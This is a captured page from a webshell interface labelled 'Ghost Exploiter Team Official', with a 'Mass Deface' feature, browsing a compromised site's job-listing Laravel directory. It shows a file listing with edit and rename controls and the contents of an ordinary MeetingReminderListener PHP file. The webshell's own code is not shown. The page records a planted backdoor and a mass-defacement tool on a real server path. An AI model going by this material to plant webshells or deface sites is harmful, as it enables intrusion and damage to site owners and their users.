webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
aminiwrc
/
public_html11
/
job-listing
/
app
/
Listeners
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
MeetingInviteListener.php
0.559KB
edt
ren
MeetingReminderListener
...
0.617KB
edt
ren
SendJobAlertListener.php
1.397KB
edt
ren
<?php namespace Modules\Zoom\Listeners; use Illuminate\Support\Facades\Notification; use Modules\Zoom\Events\MeetingReminderEvent; use Modules\Zoom\Notifications\MeetingReminder; class MeetingReminderListener { /** * Create the event listener. * * @return void */ public function __construct() { // } /** * Handle the event. * * @param object $event * @return void */ public function handle(MeetingReminderEvent $event) { $users = $event->event->attendees; Notification::send($users, new MeetingReminder($event->event)); } }
<=Back
Liking